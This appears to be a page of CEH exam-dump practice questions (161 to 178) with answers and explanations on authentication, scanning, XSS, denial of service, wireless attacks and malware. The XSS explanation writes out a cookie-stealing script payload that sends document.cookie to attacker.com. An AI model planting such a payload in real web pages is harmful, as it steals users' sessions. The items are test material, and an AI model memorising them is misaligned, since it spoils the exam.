Visit here for our full ECCouncil 312-50v13 exam dumps and practice test questions.
Question 161
An organization wants to verify the identity of users accessing systems by requiring something they know, something they have, and something they are. Which authentication approach is this?
A) Single-factor authentication
B) Two-factor authentication
C) Multi-factor authentication
D) Biometric authentication
Answer: C
Explanation:
Authentication security relies on verifying user identity before granting access. Multi-factor authentication (MFA) requires users to provide two or more different types of verification factors from separate categories, significantly enhancing security beyond single passwords.
The three main authentication factor categories include knowledge factors (something you know)—passwords, PINs, security questions, passphrases; possession factors (something you have)—smart cards, security tokens, mobile devices, hardware keys, one-time password generators; and inherence factors (something you are)—biometrics including fingerprints, facial recognition, iris scans, voice patterns, behavioral characteristics.
Multi-factor authentication strength comes from requiring compromise of multiple independent factors. If attackers steal passwords, they still need physical tokens or biometric data. This independence creates significant barriers—phishing captures passwords but not hardware tokens; stolen tokens remain useless without PINs or biometrics.
Common MFA implementations include password plus SMS codes, password plus authenticator apps (Google Authenticator, Microsoft Authenticator), password plus hardware tokens (YubiKey, RSA SecurID), password plus biometrics, and certificate-based authentication combining cryptographic credentials with additional factors.
Security benefits include breach protection—stolen passwords alone insufficient for access; phishing resistance—some MFA methods resist credential theft; compliance requirements—meeting regulatory mandates (PCI DSS, HIPAA, GDPR); reduced fraud—significantly decreasing account takeover incidents; and user confidence—enhanced trust in security measures.
Implementation considerations include user experience balance, recovery procedures for lost factors, support costs, technology compatibility, and phishing-resistant methods like FIDO2/WebAuthn providing strongest protection.
Why other options are incorrect:
A) Single-factor authentication uses only one verification method, typically passwords. This provides weakest security, vulnerable to various attacks.
B) Two-factor authentication requires exactly two factors. While the scenario describes requiring three factors (know, have, are), making MFA the most accurate answer.
D) Biometric authentication specifically uses biological characteristics. While biometrics may be one MFA component, this term doesn’t encompass the complete multi-factor approach described.
Question 162
A penetration tester discovers that a web server reveals detailed error messages including database structure and SQL queries. Which vulnerability does this represent?
A) SQL injection
B) Information disclosure
C) Cross-Site Scripting
D) Authentication bypass
Answer: B
Explanation:
Web applications must carefully manage what information they reveal to users. Information disclosure vulnerabilities occur when applications expose sensitive data through error messages, debug information, configuration details, or other channels, providing attackers valuable intelligence for targeting systems.
Information disclosure encompasses various scenarios where systems reveal more information than necessary for legitimate functionality. Detailed error messages particularly problematic because they assist attackers in understanding application architecture, identifying vulnerabilities, and crafting targeted attacks.
Common disclosure examples include verbose error messages—revealing database types, table structures, query syntax, file paths, and software versions; debug information—exposing internal application logic, variable values, and stack traces; directory listings—showing file structures and naming conventions; source code comments—containing developer notes about security mechanisms; version banners—advertising specific software versions with known vulnerabilities; and backup files—exposing configuration or source code through accessible backup copies.
Attack value includes understanding database schema for SQL injection attacks, identifying software versions for exploit selection, discovering authentication mechanisms for bypass attempts, mapping application structure for targeted attacks, and gathering credentials or API keys from configuration files.
Example scenarios include database errors displaying SQL queries revealing table names and column structures, exceptions showing internal file paths indicating server configuration, connection failures exposing backend server addresses, and authentication errors differentiating between invalid usernames versus incorrect passwords.
Remediation requires implementing generic error messages for users while logging detailed errors server-side, disabling debug modes in production, removing unnecessary comments from code, preventing directory browsing, securing backup files, customizing server banners, and conducting regular security reviews.
Why other options are incorrect:
A) SQL injection exploits insufficient input validation to inject malicious SQL commands. While information disclosure might help identify SQL injection opportunities, verbose errors themselves represent disclosure rather than injection vulnerabilities.
C) Cross-Site Scripting injects malicious scripts executing in user browsers. XSS exploits output encoding weaknesses rather than excessive information revelation in error messages.
D) Authentication bypass circumvents security controls to gain unauthorized access. While disclosed information might facilitate bypass attempts, the error message exposure itself constitutes information disclosure.
Question 163
An ethical hacker uses a technique that involves sending crafted packets to determine which hosts are active without completing TCP connections. Which scan type is this?
A) TCP Connect scan
B) TCP SYN scan
C) UDP scan
D) ICMP Echo scan
Answer: B
Explanation:
Port scanning techniques vary in stealth and effectiveness. TCP SYN scan (half-open scan) sends SYN packets to target ports without completing three-way handshakes, efficiently identifying open ports while maintaining relative stealth compared to full connection scans.
TCP SYN scanning exploits the TCP handshake process. Normal connections require three steps: client sends SYN, server responds with SYN-ACK for open ports or RST for closed ports, and client completes with ACK. SYN scans stop after receiving responses, never sending final ACK packets.
Detection mechanism analyzes server responses: SYN-ACK received—indicates open port accepting connections; RST received—indicates closed port actively rejecting connections; no response—suggests filtered port with firewall blocking; and ICMP unreachable—indicates filtering with explicit rejection messages.
Advantages include efficiency—faster than full connections since handshakes aren’t completed; stealth—some older systems don’t log incomplete connections; resource conservation—consuming fewer scanner and target resources; accuracy—reliable port state determination; and firewall evasion—bypassing some application-level filters expecting complete connections.
Technical requirements need raw socket access for crafting custom packets, typically requiring administrative privileges. Tools like Nmap implement SYN scanning with -sS flag: nmap -sS target.
Limitations include modern intrusion detection systems easily detecting SYN scan patterns, stateful firewalls tracking connection states may block or alert, and some security devices specifically designed to identify and block scanning attempts.
Modern detection involves monitoring for numerous SYN packets without corresponding ACK packets, identifying patterns of sequential port probing, analyzing connection state tables for anomalies, and correlating scanning activities across multiple targets.
Why other options are incorrect:
A) TCP Connect scan completes full three-way handshakes using the operating system’s connect() function. This loudest scan type generates complete connection logs, contrasting with SYN scan’s incomplete connections.
C) UDP scan sends UDP packets to discover open UDP services. Since UDP is connectionless, scanning is slower and less reliable than TCP SYN scanning.
D) ICMP Echo scan sends ping requests to determine host availability. While identifying active hosts, ICMP scanning doesn’t check specific TCP ports like SYN scanning does.
Question 164
A company implements a security control that automatically locks user accounts after five consecutive failed login attempts. Which attack is this primarily designed to prevent?
A) Man-in-the-Middle attack
B) Brute force attack
C) Session hijacking
D) SQL injection
Answer: B
Explanation:
Authentication mechanisms require protection against automated attack methods. Account lockout policies defend against brute force attacks where attackers systematically try numerous password combinations, either sequentially testing all possibilities or using dictionaries of common passwords.
Brute force attacks attempt authentication by trying many passwords rapidly until finding the correct one. Without countermeasures, attackers can test thousands or millions of combinations using automated tools, eventually succeeding against weak passwords or discovering credentials through persistence.
Account lockout mechanisms counter brute force by monitoring failed authentication attempts and temporarily or permanently disabling accounts after exceeding thresholds. After five failed attempts, the account locks, requiring administrator intervention or time-based automatic unlock, effectively stopping automated password guessing.
Implementation parameters include threshold count—failed attempts before lockout (typically 3-10); lockout duration—temporary locks (15-30 minutes) or permanent requiring manual unlock; reset period—timeframe for counting failures (attempts within 15 minutes); notification—alerting users and administrators; and exceptions—potentially excluding certain administrative accounts.
Security benefits include automated attack prevention—stopping password guessing tools; slow attack mitigation—even slow attempts eventually trigger lockouts; detection capability—failed attempt patterns indicating attacks; deterrence—making attacks impractical through time consumption; and audit trails—logging suspicious authentication patterns.
Considerations include balancing security against usability (avoiding legitimate user lockouts), addressing denial of service attacks intentionally locking accounts, implementing CAPTCHA as lockout alternatives, monitoring for distributed attacks against multiple accounts, and establishing clear unlock procedures.
Advanced protections combine lockout with progressive delays (increasing wait times between attempts), account monitoring flagging suspicious patterns, IP-based rate limiting, and multi-factor authentication eliminating password-only dependency.
Why other options are incorrect:
A) Man-in-the-Middle attacks intercept communications between parties. Account lockout doesn’t address interception attacks, which require encryption and certificate validation for prevention.
C) Session hijacking steals active session identifiers to impersonate authenticated users. Lockout policies don’t protect against session theft, which requires secure session management and monitoring.
D) SQL injection exploits insufficient input validation in database queries. Account lockout addresses authentication attacks rather than input validation vulnerabilities in application code.
Question 165
An attacker creates a fake wireless access point with the same SSID as a legitimate network to intercept user traffic. What type of attack is this?
A) Deauthentication attack
B) Evil twin attack
C) WPS attack
D) Packet sniffing
Answer: B
Explanation:
Wireless network attacks exploit user trust and connectivity behavior. Evil twin attacks create fraudulent access points mimicking legitimate networks, tricking users into connecting and routing their traffic through attacker-controlled infrastructure.
Evil twin refers to rogue access points impersonating trusted wireless networks. Attackers configure access points with identical or similar SSIDs, potentially matching security settings, and position themselves where targets naturally seek WiFi connectivity—coffee shops, airports, hotels, conference centers.
Attack methodology involves reconnaissance to identify target networks and their characteristics, deploying rogue access points broadcasting matching SSIDs, potentially jamming legitimate networks forcing reconnection, waiting for victims to connect automatically or manually, intercepting all traffic passing through the malicious access point, and potentially stripping encryption or presenting fake authentication portals.
User perspective shows available network appearing legitimate—same name, similar signal strength. Users connect believing they’re accessing trusted infrastructure, unaware that attackers control the access point and can monitor, modify, or redirect all traffic.
Attack objectives include credential theft—capturing login credentials through fake portals or monitoring unencrypted authentication; traffic interception—reading sensitive communications including emails, messages, browsing; man-in-the-middle positioning—enabling further attacks against connected users; malware distribution—redirecting downloads to infected versions; and session hijacking—stealing authentication tokens.
Technical implementation uses portable equipment like laptops with wireless cards, dedicated WiFi Pineapple devices, or even smartphones with hotspot capabilities. Tools like Airbase-ng, hostapd, or commercial penetration testing tools facilitate creation.
Detection challenges include users having difficulty distinguishing legitimate from malicious networks, automatic connection features connecting without user awareness, and evil twins potentially offering stronger signals than legitimate networks.
Prevention requires avoiding untrusted networks, verifying network authenticity with staff, using VPNs encrypting all traffic regardless of network security, disabling automatic connection features, monitoring for certificate warnings, and maintaining updated security software.
Why other options are incorrect:
A) Deauthentication attacks forcibly disconnect clients from access points using spoofed management frames. While potentially used alongside evil twins, deauth attacks disrupt connections rather than creating fake access points.
C) WPS attacks exploit Wi-Fi Protected Setup vulnerabilities to recover WPA2 passphrases through PIN brute forcing. This targets legitimate access points rather than creating fake ones.
D) Packet sniffing captures network traffic for analysis. While evil twins enable sniffing, the described scenario specifically involves creating fake access points rather than passively monitoring traffic.
Question 166
A security team wants to identify security weaknesses in systems without actually exploiting them. Which assessment type should be conducted?
A) Penetration test
B) Vulnerability assessment
C) Red team exercise
D) Social engineering test
Answer: B
Explanation:
Security assessments range from passive identification to active exploitation. Vulnerability assessments systematically identify, quantify, and prioritize security weaknesses in systems without actually exploiting discovered vulnerabilities, providing risk understanding without compromise risks.
Vulnerability assessment uses automated scanning tools, manual inspection, and configuration reviews to discover security flaws including missing patches, misconfigurations, weak passwords, unnecessary services, and known vulnerabilities. The focus remains on identification and reporting rather than exploitation validation.
Assessment process includes scope definition—identifying systems, networks, and applications to assess; scanning execution—using tools like Nessus, Qualys, OpenVAS, or Rapid7; credential vs non-credential—authenticated scans providing deeper visibility versus external perspectives; manual verification—confirming automated findings and identifying false positives; risk prioritization—ranking vulnerabilities by severity and exploitability; and reporting—documenting findings with remediation recommendations.
Scanner capabilities include identifying missing security patches, detecting default or weak credentials, discovering misconfigured security settings, checking for known vulnerabilities (CVEs), analyzing network services and versions, identifying compliance violations, and mapping attack surfaces.
Advantages include comprehensive coverage—efficiently scanning numerous systems; non-disruptive—avoiding exploitation risks to production environments; regular scheduling—enabling continuous monitoring; compliance support—meeting regulatory requirements; prioritization—helping focus remediation efforts; and trend analysis—tracking security posture over time.
Limitations include potential false positives requiring validation, false negatives missing certain vulnerabilities, inability to assess exploitability without testing, contextual gaps missing business logic flaws, and dependence on signature updates for latest vulnerability detection.
Complementary activities combine vulnerability assessment with penetration testing validating exploitability, configuration management ensuring consistent settings, patch management addressing identified gaps, and security monitoring detecting exploitation attempts.
Why other options are incorrect:
A) Penetration testing actively exploits vulnerabilities to demonstrate real-world attack impact, going beyond identification to validation through compromise attempts.
C) Red team exercises simulate sophisticated adversaries using multiple attack vectors, focusing on achieving specific objectives through exploitation rather than systematic vulnerability identification.
D) Social engineering tests specifically target human vulnerabilities through phishing, pretexting, or physical intrusion attempts rather than technical system weaknesses.
Question 167
An ethical hacker discovers that a web application accepts and executes user-supplied JavaScript code in the browser context. Which vulnerability exists?
A) SQL injection
B) Cross-Site Scripting (XSS)
C) Command injection
D) Directory traversal
Answer: B
Explanation:
Web applications must properly handle user input before including it in output. Cross-Site Scripting (XSS) vulnerabilities occur when applications accept and execute user-supplied code (typically JavaScript) in browsers without proper validation or sanitization, enabling attackers to execute malicious scripts in victim browsers.
XSS exploitation allows attackers to inject client-side scripts into web pages viewed by other users. When victims access compromised pages, malicious scripts execute in their browser contexts with full access to cookies, session tokens, DOM, and ability to modify page content.
Attack mechanics involve identifying input fields reflected in application output, crafting malicious JavaScript payloads, injecting code through vulnerable parameters, and executing in victim browsers when they view affected pages. Example payload: <script>document.location=’http://attacker.com/steal?cookie=’+document.cookie</script>.
XSS categories include Reflected XSS—immediately reflecting input without storage; Stored XSS—permanently saving malicious code in databases; DOM-based XSS—client-side script manipulation; and Mutation XSS—exploiting browser parsing behavior.
Attack objectives include session hijacking—stealing authentication cookies to impersonate users; credential theft—displaying fake login forms capturing passwords; phishing—redirecting to malicious sites or presenting fraudulent content; keylogging—capturing all user input; malware distribution—exploiting browser vulnerabilities; and website defacement—modifying visual appearance.
Real-world impact enables account takeover, sensitive data theft, malware propagation, reputation damage, and regulatory compliance violations. High-profile XSS vulnerabilities have affected major platforms including social networks, webmail services, and e-commerce sites.
Prevention requires input validation—accepting only expected characters and patterns; output encoding—converting special characters to HTML entities before display; Content Security Policy—restricting script sources and inline execution; HTTPOnly cookies—preventing JavaScript cookie access; security headers—implementing X-XSS-Protection; and framework protections—using modern frameworks with built-in XSS prevention.
Why other options are incorrect:
A) SQL injection targets database layer by injecting malicious SQL commands, exploiting insufficient query parameterization rather than browser-side script execution.
C) Command injection executes operating system commands on servers through vulnerable applications, targeting server-side execution rather than client-side browser scripts.
D) Directory traversal manipulates file paths to access unauthorized files using sequences like ../, exploiting file system access rather than script execution capabilities.
Question 168
A company wants to ensure that terminated employees immediately lose access to all systems and resources. Which access control principle should be implemented?
A) Role-Based Access Control
B) Centralized access management
C) Mandatory Access Control
D) Discretionary Access Control
Answer: B
Explanation:
Managing user access across multiple systems presents significant security challenges. Centralized access management provides unified identity and access control, enabling organizations to grant, modify, or revoke permissions across all systems from single administrative interfaces.
Centralized management consolidates authentication and authorization decisions through identity providers or access management platforms. When users terminate employment, administrators disable accounts once, automatically revoking access to all connected systems, applications, and resources simultaneously.
Implementation technologies include Active Directory—Microsoft’s directory service for Windows environments; LDAP servers—lightweight directory access protocol for cross-platform identity management; Identity-as-a-Service—cloud-based solutions like Okta, Azure AD, Google Workspace; Single Sign-On—enabling unified authentication across applications; and privileged access management—controlling administrative credentials centrally.
Advantages include immediate revocation—terminating access instantly across all systems; consistency—ensuring uniform access policies; reduced administration—managing users once rather than per-system; audit capabilities—centralized logging of access activities; compliance support—demonstrating access control governance; and onboarding efficiency—rapidly provisioning new users.
User lifecycle management encompasses provisioning accounts during onboarding, modifying permissions for role changes, temporarily suspending for leaves of absence, immediately disabling for terminations, and eventually deleting inactive accounts after retention periods.
Access revocation workflow includes HR initiating termination notifications, automated workflows triggering across identity systems, immediate account disabling preventing authentication, access removal from applications and systems, physical access card deactivation, and comprehensive audit logging documenting timing.
Challenges include initial implementation complexity requiring system integration, ensuring all applications connect to centralized systems, maintaining synchronization across distributed environments, establishing disaster recovery procedures, and balancing automation with required human oversight.
Why other options are incorrect:
A) Role-Based Access Control assigns permissions based on organizational roles. While RBAC simplifies permission management, it doesn’t specifically address centralized control enabling simultaneous access revocation.
C) Mandatory Access Control uses system-enforced security labels and clearances, typically in government/military contexts. MAC addresses access control methodology rather than centralized management capabilities.
D) Discretionary Access Control allows resource owners to control access to their resources. DAC describes permission delegation rather than centralized management enabling comprehensive immediate revocation.
Question 169
An attacker sends a large number of connection requests to exhaust server resources and prevent legitimate users from accessing services. What type of attack is this?
A) Ping flood
B) SYN flood
C) Smurf attack
D) DNS amplification
Answer: B
Explanation:
Denial of Service attacks exploit protocol weaknesses to overwhelm systems. SYN flood attacks exploit the TCP three-way handshake mechanism by sending numerous SYN packets without completing connections, exhausting server resources allocated for half-open connections.
TCP handshake vulnerability exists because servers allocate resources upon receiving SYN packets before authentication completes. Normal handshakes involve client sending SYN, server responding with SYN-ACK and allocating connection resources, and client completing with ACK. SYN floods send countless SYN packets but never send final ACK packets.
Attack mechanics involve generating massive SYN packet volumes using spoofed source addresses preventing responses from reaching attackers, targeting server connection queues (backlog) filling available slots with half-open connections, exhausting server memory and CPU tracking connection states, and preventing legitimate connection establishment once queues fill.
Resource exhaustion occurs through connection table filling with pending connections, memory consumption for tracking state information, CPU overhead processing connection attempts, and potential firewall state table exhaustion affecting network infrastructure.
Attack effectiveness increases through distributed attacks using botnets, spoofed source addresses complicating filtering, targeting specific service ports, and sustaining attacks longer than server timeout periods.
Detection indicators include unusually high SYN packet rates, numerous half-open connections in network state tables, connection establishment failures for legitimate users, server performance degradation, and monitoring alerts for abnormal connection patterns.
Mitigation strategies include SYN cookies—cryptographic techniques avoiding state allocation until handshake completion; connection rate limiting—restricting new connections per timeframe; increased backlog queues—allocating more connection tracking capacity; firewalls and IPS—filtering malicious traffic patterns; timeout reduction—faster release of half-open connections; upstream filtering—ISP-level traffic blocking; and DDoS mitigation services—specialized providers absorbing attack traffic.
Why other options are incorrect:
A) Ping floods send excessive ICMP Echo Request packets consuming bandwidth and processing resources. While also DoS attacks, ping floods use ICMP rather than exploiting TCP handshake mechanisms.
C) Smurf attacks send ICMP packets to broadcast addresses with spoofed victim source addresses, causing multiple responses overwhelming targets. This amplification attack differs from SYN flood’s handshake exploitation.
D) DNS amplification exploits DNS servers sending large responses to queries with spoofed source addresses, amplifying attack traffic. This uses DNS protocol rather than TCP SYN flooding.
Question 170
A security professional needs to securely transmit sensitive data over the internet by converting it into an unreadable format. Which security technique should be used?
A) Hashing
B) Encryption
C) Compression
D) Encoding
Answer: B
Explanation:
Protecting data confidentiality during transmission requires strong security mechanisms. Encryption transforms readable plaintext into unreadable ciphertext using cryptographic algorithms and keys, ensuring only authorized parties possessing correct decryption keys can restore data to readable format.
Encryption fundamentals use mathematical algorithms (ciphers) and secret keys to perform reversible transformations. Legitimate recipients possessing appropriate keys decrypt ciphertext back to original plaintext, while attackers without keys find data unintelligible.
Encryption types include symmetric encryption—using identical keys for encryption and decryption (AES, DES, 3DES, Blowfish), offering fast performance for large data volumes; and asymmetric encryption—using key pairs where public keys encrypt and private keys decrypt (RSA, ECC), providing key distribution advantages but slower performance.
Data protection scenarios include data in transit—protecting communications over networks using TLS/SSL, VPNs, SSH; data at rest—securing stored files, databases, backups; data in use—protecting active processing through secure enclaves; and end-to-end encryption—ensuring only endpoints can decrypt, protecting against intermediary access.
Common protocols for internet transmission include TLS/SSL—encrypting web traffic (HTTPS), email (SMTPS, IMAPS), and other application protocols; IPsec—network layer encryption for VPNs; SSH—secure remote administration; and PGP/GPG—email encryption.
Key management critically impacts security. Organizations must securely generate strong random keys, protect keys from unauthorized access, implement key rotation schedules, establish backup and recovery procedures, and maintain separation between data and keys.
Encryption strength depends on algorithm selection (modern standards like AES-256 or RSA-2048+), key length (longer keys providing stronger security), proper implementation avoiding side-channel vulnerabilities, and secure key management throughout lifecycles.
Why other options are incorrect:
A) Hashing creates fixed-length digests from input data, providing integrity verification but not confidentiality. Hash functions are one-way transformations that cannot be reversed to recover original data.
C) Compression reduces data size by eliminating redundancy, improving storage and transmission efficiency. While useful, compression doesn’t protect confidentiality—compressed data remains readable once decompressed.
D) Encoding transforms data between formats (Base64, ASCII, URL encoding) for compatibility purposes. Encoding provides no security—anyone can decode without keys, making data fully readable.
Question 171
An ethical hacker performs reconnaissance by searching public sources like social media, company websites, and news articles without directly interacting with target systems. What type of reconnaissance is this?
A) Active reconnaissance
B) Passive reconnaissance
C) Social engineering
D) Vulnerability scanning
Answer: B
Explanation:
Information gathering follows different approaches based on target interaction. Passive reconnaissance collects intelligence about targets using publicly available information and observational techniques without directly engaging target systems, maintaining stealth and avoiding detection.
Passive reconnaissance leverages open-source intelligence (OSINT) from publicly accessible sources. Attackers gather substantial information without generating logs, alerts, or suspicious activity on target networks, making detection virtually impossible during this phase.
Information sources include search engines—using advanced Google queries (Google Dorking) finding sensitive information; social media—LinkedIn for organizational structure, employee information, Facebook/Twitter for personal details; company websites—job postings revealing technologies, press releases announcing initiatives; DNS records—WHOIS data, DNS enumeration for infrastructure mapping; public databases—SEC filings, patent databases, business registrations; code repositories—GitHub accidentally exposing credentials or sensitive code; and archived content—Wayback Machine for historical website versions.
Gathered intelligence provides organizational structure understanding, employee names and contact information, technology stack identification, network infrastructure details, business relationships and partnerships, security posture insights, and potential social engineering targets.
Common techniques include WHOIS lookups—identifying domain ownership and contacts; DNS enumeration—discovering subdomains and mail servers; social media profiling—building target dossiers; job posting analysis—learning required skills and technologies; metadata extraction—finding information in document properties; and netcraft queries—researching web server technologies.
Advantages include complete stealth without target system interaction, no legal concerns since information is public, unlimited time for thorough research, and valuable planning information for subsequent attack phases.
Defensive limitations make passive reconnaissance difficult to prevent since information is publicly available. Organizations should minimize information exposure, educate employees about oversharing, monitor for information leakage, control metadata in published documents, and implement social media policies.
Why other options are incorrect:
A) Active reconnaissance directly interacts with target systems through port scanning, vulnerability scanning, or enumeration. This generates logs and potentially triggers security alerts, contrasting with passive information gathering.
C) Social engineering manipulates people into revealing information or performing actions, involving direct human interaction. While reconnaissance might inform social engineering, it’s not reconnaissance itself.
D) Vulnerability scanning actively probes systems identifying security weaknesses. Scanning generates significant traffic and alerts, representing active rather than passive techniques.
Question 172
A company implements a security policy requiring all sensitive data to be classified and labeled based on confidentiality levels. Which security principle is being applied?
A) Data Loss Prevention
B) Data classification
C) Data encryption
D) Data backup
Answer: B
Explanation:
Managing information security requires understanding data sensitivity levels. Data classification systematically categorizes information assets based on confidentiality, integrity, and availability requirements, enabling appropriate protection controls matching data value and risk.
Classification process establishes standardized categories (Public, Internal, Confidential, Restricted), defines criteria for each level, assigns data owners responsible for classification, applies labels to data assets, implements appropriate security controls per classification, and regularly reviews classifications as requirements change.
Common classification levels include Public—information suitable for unrestricted disclosure; Internal/Private—information for internal organizational use; Confidential—sensitive business information requiring protection; Restricted/Secret—highly sensitive information with severe impact if disclosed; and Top Secret—critical national security information (government contexts).
Security control mapping applies different protections based on classification: Public data—minimal controls, publicly accessible; Confidential data—encryption, access controls, audit logging; Restricted data—strong encryption, multi-factor authentication, physical security, extensive monitoring.
Implementation benefits include appropriate protection—matching security investment to data value; resource optimization—avoiding over-protection of low-sensitivity data; compliance support—meeting regulatory requirements (GDPR, HIPAA, PCI DSS); incident response—prioritizing responses based on classification; user awareness—clear handling expectations; and legal defensibility—demonstrating due diligence.
Labeling mechanisms mark documents with classification headers/footers, embed metadata in electronic files, use watermarks for sensitive documents, implement color-coding systems, apply physical labels to media, and integrate with DLP systems.
Responsibilities include data owners—business units determining classification; data custodians—IT implementing technical controls; data users—handling data according to classification; and security teams—enforcing policies and monitoring compliance.
Challenges include initial classification effort for existing data, maintaining accuracy as data changes, balancing granularity against complexity, ensuring consistent application across organization, and integrating with technical systems.
Why other options are incorrect:
A) Data Loss Prevention prevents unauthorized data transmission using technical controls. While DLP may use classification for policy enforcement, it’s a technology tool rather than the classification principle itself.
C) Data encryption protects confidentiality through cryptographic transformation. Encryption is a security control that might be applied based on classification rather than the classification process.
D) Data backup ensures availability and recovery capabilities. Backups protect against data loss but don’t involve categorizing data based on sensitivity levels.
Question 173
Which tool is commonly used for passive footprinting to gather domain and network information?
A) Nmap
B) Maltego
C) Metasploit
D) John the Ripper
Answer: B
Explanation:
A) Nmap is primarily used for active scanning to discover open ports, services, and host information. While powerful, it generates network traffic that may alert administrators, so it is not a passive footprinting tool.
B) Maltego is the correct choice because it is designed for passive footprinting and reconnaissance. It can gather domain ownership, email addresses, IP ranges, social media connections, and network relationships without directly interacting with the target. Maltego’s visual graph mapping allows ethical hackers to see relationships between entities, aiding in planning attacks or testing network defenses. Passive footprinting is important because it reduces the risk of detection and provides valuable intelligence before launching active scans or exploitation. Using Maltego, security professionals can create comprehensive digital profiles of organizations, detect weak points, and simulate attack paths.
C) Metasploit is a penetration testing framework used for exploitation and post-exploitation tasks. It is not primarily used for passive reconnaissance but can integrate with footprinting data to execute exploits.
D) John the Ripper is a password-cracking tool and has no capabilities for network or domain footprinting. It is used after passwords or hashes have been obtained to test password strength.
Maltego exemplifies ethical reconnaissance, giving security testers insight into target topology and potential attack vectors without alerting the system owners. It is widely used in social engineering, phishing assessments, and OSINT collection. For CEH preparation, understanding the difference between passive and active tools is crucial: passive tools like Maltego observe and analyze data externally, while active tools like Nmap or Metasploit interact with the target.
Question 174
Which type of malware allows attackers to gain persistent control over a system without detection?
A) Trojan
B) Rootkit
C) Ransomware
D) Worm
Answer: B
Explanation:
A) Trojans are malware disguised as legitimate software. They provide unauthorized access but may not maintain persistence as efficiently as rootkits.
B) Rootkit is the correct answer. Rootkits are designed to hide their presence and maintain persistent control over a system. They operate at the kernel or system level, modifying OS functionality to avoid detection by antivirus tools. Rootkits can conceal processes, files, network connections, and other malware, making it difficult for system administrators to detect the compromise. Attackers use rootkits for long-term espionage, keylogging, or maintaining backdoors. Detecting rootkits requires specialized tools like behavioral analysis, integrity checkers, or offline scanning, because traditional antivirus solutions may not identify them.
C) Ransomware encrypts files and demands payment but does not provide hidden persistent control. Its goal is immediate impact rather than stealthy persistence.
D) Worms are self-replicating malware that spreads across networks. They can cause significant disruption but do not typically maintain stealthy persistence on the system itself.
Rootkits are particularly dangerous because they compromise system integrity, conceal other malware, and evade conventional security tools. CEH exam takers must understand rootkit behavior, installation methods, and detection techniques. Ethical hackers practice analyzing memory dumps, file integrity, and system hooks to detect and mitigate rootkits, which is critical for incident response and malware forensics.
Question 175
Which cryptographic attack attempts to derive a key by analyzing ciphertext and known plaintext pairs?
A) Brute Force Attack
B) Ciphertext-only Attack
C) Known-Plaintext Attack
D) Rainbow Table Attack
Answer: C
Explanation:
A) Brute Force attacks involve trying all possible key combinations until the correct key is found. They require significant computation time and are not optimized by plaintext knowledge.
B) Ciphertext-only attacks attempt to analyze ciphertext without any knowledge of the plaintext, making it more difficult to derive the encryption key.
C) Known-Plaintext Attack is correct. In this type of attack, the attacker has access to one or more pairs of plaintext and corresponding ciphertext. Using these pairs, the attacker attempts to analyze the encryption algorithm and derive the key or additional plaintexts. This type of attack is common against symmetric encryption schemes and weak ciphers. Cryptanalysts study the relationship between plaintext and ciphertext to break encryption, reveal patterns, or reduce key search space. Knowing plaintext allows the attacker to exploit algorithm weaknesses or implementation flaws effectively.
D) Rainbow Table attacks target hashed passwords using precomputed tables to reverse hashes, which is different from encryption attacks.
CEH candidates should understand cryptanalysis techniques including known-plaintext, chosen-plaintext, and ciphertext-only attacks. Understanding how encryption can be exploited under certain scenarios helps ethical hackers identify weak encryption implementations, assess system security, and propose mitigation strategies. Knowledge of known-plaintext attacks also emphasizes the importance of key rotation, strong ciphers, and proper encryption management to maintain system security.
Question 176
Which type of social engineering involves manipulating users to reveal confidential information over the phone?
A) Phishing
B) Vishing
C) Tailgating
D) Smishing
Answer: B
Explanation:
A) Phishing typically uses emails or messages to trick users into providing credentials or sensitive information.
B) Vishing is correct. Vishing, or voice phishing, involves attackers calling individuals and impersonating trusted entities (like banks or IT support) to extract confidential information such as passwords, PINs, or account details. Attackers often use psychological manipulation, urgency, or fear to convince victims to comply. Vishing can also involve spoofed caller IDs, making it appear as if the call comes from a legitimate source. Ethical hackers studying vishing learn how to detect such attacks, train users, and implement protective measures such as verification procedures and awareness programs.
C) Tailgating refers to physical social engineering, where an unauthorized person gains entry to a restricted area by following an authorized individual.
D) Smishing is similar to phishing but occurs via SMS or messaging apps, tricking users into clicking malicious links or providing data.
Vishing is a critical aspect of social engineering awareness in CEH. Understanding voice-based attack techniques helps professionals design training programs, develop incident response protocols, and test organizational resilience against manipulation. Recognizing behavioral patterns and attack strategies prepares ethical hackers for comprehensive security assessments.
Question 177
Which type of penetration testing involves simulating an external hacker without prior knowledge of the internal network?
A) Black Box Testing
B) White Box Testing
C) Gray Box Testing
D) Red Teaming
Answer: A
Explanation:
A) Black Box Testing is correct. In this type of penetration testing, the tester simulates the actions of an external attacker with no prior knowledge of the target system or network. Black box testing focuses on identifying vulnerabilities from an external perspective, such as public-facing web applications, exposed ports, and network perimeter weaknesses. Testers rely on footprinting, reconnaissance, scanning, and exploitation techniques to find and exploit security gaps. The approach mimics real-world attack scenarios where hackers do not have insider information, making it highly relevant for evaluating an organization’s external defenses.
B) White Box Testing involves full access to internal system documentation, source code, and network diagrams. This type of testing focuses on internal vulnerabilities and code-level flaws, which is different from external attack simulation.
C) Gray Box Testing is a hybrid approach where testers have limited knowledge of the internal systems. While useful, it is not purely an external simulation like black box testing.
D) Red Teaming refers to comprehensive adversary simulation exercises, which may combine physical, social, and digital attack methods. While it includes external testing, it goes beyond black box methodology in scope and strategy.
Black box penetration testing is crucial for CEH professionals because it demonstrates how vulnerable systems appear to outsiders, highlighting misconfigurations, exposed services, and weak authentication. Testers use tools such as Nmap, Nikto, OpenVAS, and Metasploit to detect and exploit vulnerabilities, while documenting findings to improve network security, access control, and monitoring. By performing black box testing, organizations can understand how a malicious external actor might penetrate their defenses and implement defensive strategies, intrusion detection systems, and firewall configurations to mitigate risks. Ethical hackers must also learn to prioritize vulnerabilities, conduct risk assessments, and report actionable remediation steps based on findings from black box testing exercises.
Question 178
Which wireless attack captures data packets to extract sensitive information such as passwords or session tokens?
A) Evil Twin Attack
B) Packet Sniffing
C) War Driving
D) Bluejacking
Answer: B
Explanation:
A) Evil Twin Attacks involve setting up a rogue access point that mimics a legitimate Wi-Fi network. Users connect to it unknowingly, allowing attackers to intercept data. While effective, this attack specifically exploits network impersonation rather than packet capture alone.
B) Packet Sniffing is correct. It involves capturing network traffic as it traverses the network. Tools like Wireshark, tcpdump, and Ettercap allow attackers to intercept data packets and analyze them for sensitive information including passwords, session cookies, and unencrypted communications. Sniffing is particularly effective on unencrypted wireless networks, where all transmitted data is exposed. Ethical hackers use packet sniffing during penetration testing to assess the strength of network encryption, monitor traffic patterns, and identify security misconfigurations. Proper defense mechanisms include WPA3 encryption, secure VPNs, and network segmentation, which prevent attackers from easily intercepting sensitive data.
C) War Driving is the practice of searching for Wi-Fi networks from a moving vehicle. While it can identify networks for potential attacks, it does not involve capturing packets directly.
